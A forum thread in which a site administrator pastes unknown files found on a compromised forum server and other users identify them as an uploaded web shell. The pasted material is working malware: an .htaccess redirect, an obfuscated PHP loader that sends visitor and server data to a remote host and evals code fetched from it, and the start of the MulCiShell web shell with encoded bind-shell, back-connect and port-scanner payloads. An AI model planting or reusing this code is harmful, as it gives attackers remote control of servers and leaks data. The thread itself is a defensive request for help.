I was doing a backup and about to do an upgrade when I came across these files but don't know where they came from.

In forum root there are two. 5725.php, mshell.php and an entry into the .htaccess . In the attachment folder I have the same 3 files and in every other attachment folder. The same for customavatars, customprofilepics and signaturepics. mshell.php is allways named the same but the first file, 5725.php, is allways a string of numbers which are different.

Has anybody come across these before? What are they, what are they supposed to do and what should I do about them?

.htaccess
Options -MultiViews
ErrorDocument 404 //forum/5725.php

Options -MultiViews
ErrorDocument 404 /forum/5725.php

5725.php
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="ec0962378ef742df0bcf07a488bc5697") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2FkczIu").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode ("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1) ;$o=curl_exec($cu);curl_close($cu);eval($o);};die( ); ?>

mshell.php
<?php
#/\/\/\/\/\ MulCiShell v0.2 /\/\/\/\/\/\/\#
# Updates from version 1.0#
# 1) Fixed MySQL insert function
# 2) Fixed trailing dirs
# 3) Fixed file-editing when set to 777
# 4) Removed mail function (who needs it?)
# 5) Re-wrote & improved interface
# 6) Added actions to entire directories
# 7) Added config+forum finder
# 8) Added MySQL dump function
# 9) Added DB+table creation, DB drop, table delete, and column+table count
# 10) Updated security-info feature to include more useful details
# 11) _Greatly_ Improved file browsing and handling
# 12) Added banner
# 13) Added DB-Parser and locator
# 14) Added enumeration function
# 15) Added common functions for bypassing security restrictions
# 16) Added bindshell & backconnect (needs testing)
# 17) Improved command execution (alts)
#/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/#
@ini_set("memory_limit","256M");
@set_magic_quotes_runtime(0);
session_start();
ob_start();
$start=microtime();
if(isset($_GET['theme'])) $_SESSION['theme']=$_GET['theme'];
//Thanks korupt ;)
$backdoor_c="DQojaW5jbHVkZSA8YXNtL2lvY3Rscy5oPg0KI2luY2x1ZGUgPH N5cy90aW1lLmg+DQojaW5jbHVkZSA8c3lzL3NlbGVjdC5oPg0K I2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC 5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jbHVkZSA8c3Ry aW5nLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlID xzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+ DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPH N0ZGludC5oPg0KI2luY2x1ZGUgPHB0aHJlYWQuaD4NCg0Kdm9p ZCAqQ2xpZW50SGFuZGxlcih2b2lkICpjbGllbnQpDQp7DQoJaW 50IGZkID0gKGludCljbGllbnQ7DQoJZHVwMihmZCwgMCk7DQoJ ZHVwMihmZCwgMSk7DQoJZHVwMihmZCwgMik7DQoJaWYoZm9yay gpID09IDApDQoJCWV4ZWNsKCIvYmluL2Jhc2giLCAicmVzbW9u IiwgMCk7DQoJY2xvc2UoZmQpOw0KCXJldHVybiAwOw0KfQ0KDQ ppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqYXJndltdKQ0Kew0K CWludCBtc29jaywgY3NvY2ssIGkgPSAxOw0KCXB0aHJlYWRfdC B0aHJlYWQ7DQoJc3RydWN0IHNvY2thZGRyIHNhZGRyOw0KCXN0 cnVjdCBzb2NrYWRkcl9pbiBzYWRkckluOw0KICAgIGludCBwb3 J0PWF0b2koYXJndlsxXSk7DQoJaWYoKG1zb2NrID0gc29ja2V0 KEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBJUFBST1RPX1RDUCkpID 09IC0xKQ0KCQlyZXR1cm4gLTE7DQoNCglzYWRkckluLnNpbl9m YW1pbHkJCT0gQUZfSU5FVDsNCglzYWRkckluLnNpbl9hZGRyLn NfYWRkcgk9IElOQUREUl9BTlk7DQoJc2FkZHJJbi5zaW5fcG9y dAkJPSBodG9ucyhwb3J0KTsNCiAgIA0KCW1lbWNweSgmc2FkZH IsICZzYWRkckluLCBzaXplb2Yoc3RydWN0IHNvY2thZGRyX2lu KSk7DQoJc2V0c29ja29wdChtc29jaywgU09MX1NPQ0tFVCwgU0 9fUkVVU0VBRERSLCAoY2hhciAqKSZpLCBzaXplb2YoaSkpOw0K IA0KCWlmKGJpbmQobXNvY2ssICZzYWRkciwgc2l6ZW9mKHNhZG RyKSkgIT0gMCl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJu IC0xOw0KCX0NCiANCglpZihsaXN0ZW4obXNvY2ssIDEwKSA9PS AtMSl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJuIC0xOw0K CX0NCiANCgl3aGlsZSgxKXsNCgkJaWYoKGNzb2NrID0gYWNjZX B0KG1zb2NrLCBOVUxMLCBOVUxMKSkgIT0gLTEpew0KCQkJcHRo cmVhZF9jcmVhdGUoJnRocmVhZCwgMCwgaGFuZGxlciwgKHZvaW QgKiljc29jayk7DQoJCX0NCgl9DQoJDQoJcmV0dXJuIDE7DQp9";
$backconnect_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KbXkgKCRpYW RkciwkcG9ydCwkY21kKT1AQVJHVjsNCm15ICRwYWRkcj1zb2Nr YWRkcl9pbigkcG9ydCwgaW5ldF9hdG9uKCRpYWRkcikpOw0KbX kgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0Kc29j a2V0KFNPQ0tFVCwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm 90byk7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKTsNCm9wZW4o U1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERJTiwiPiZTT0 NLRVQiKTsNCnByaW50IFNPQ0tFVCAiU2hlbGwgdGVzdFxuIjsN CnByaW50IGV4ZWMoJGNtZCk7DQpjbG9zZShTVERJTik7DQpjbG 9zZShTVERPVVQpOw0K";
$pl_scan="DQoJIyEvdXNyL2Jpbi9wZXJsDQp1c2Ugd2FybmluZ3M7DQp1c2 Ugc3RyaWN0Ow0KdXNlIGRpYWdub3N0aWNzOw0KdXNlIElPOjpT b2NrZXQ6OklORVQ7DQpzdWIgdXNhZ2UNCnsNCglkaWUoIiQwIG hvc3Qgc3RhcnRwb3J0IGVuZHBvcnQKIik7DQp9DQp1c2FnZSB1 bmxlc3MoQEFSR1Y+MSk7DQpteSgkaG9zdCwkcywkZSk9QEFSR1 Y7DQpmb3JlYWNoKCRzLi4kZSkNCnsNCglteSAkc29jaz1JTzo6 U29ja2V0OjpJTkVULT5uZXcNCgkoDQoJCVBlZXJBZGRyPT4kaG 9zdCwNCgkJUGVlclBvcnQ9PiRfLA0KCQlQcm90bz0+J3RjcCcs DQoJCVRpbWVvdXQ9PjINCgkpOw0KCXByaW50ICJQb3J0ICBvcG VuCiIgaWYgKCRcc29jayk7DQp9DQoNCgk=";
$access_control=0;
$md5_user="MulCiber";
$md5_pass="123";
$user_agent="MulCiber";
$allowed_addrs=array('127.0.0.1');
$shell_email="mulciber-@hotmail.com";
$self=basename($_SERVER['PHP_SELF']);
$addr=$_SERVER['REMOTE_ADDR'];
$serv=@gethostbyname($_SERVER['HTTP_HOST']);
$soft=$_SERVER['SERVER_SOFTWARE'];
==========FILE CUT=============

they are for sure unwanted files that most likely are used to hack your site.

Thanks for your reply.

I have already removed all instances of them but I haven't been hacked or haven't seen anything that would indicate it. I have seen quite a few site that have these files as well but haven't found any information about them.

Thanks for your reply.

I have already removed all instances of them but I haven't been hacked or haven't seen anything that would indicate it. I have seen quite a few site that have these files as well but haven't found any information about them.

The fact that files are there you didnt place there, is a good indication that you've been hacked. Along with removing those files, i'd update passwords, remove any modifications you dont need and make sure your server software is the most up to date versions available

You have the directory chmod 777 and anonymous ftp activated.

Seems to be a shell someone has uploaded onto your server.

Google: http://www.google.com/search?q=mshell.php

Looks nasty. Real nasty. Scary nasty. I'm going to start scanning for these files on my own servers.

Looks like this is done by a Remote File Inclusion exploit.

mshell is one of many shell scripts users upload to your server or run remotely via the exploit. It's nasty. I read up on it the other night. I had no idea anything like that could be done. Nasty nasty. Stupid script kiddies.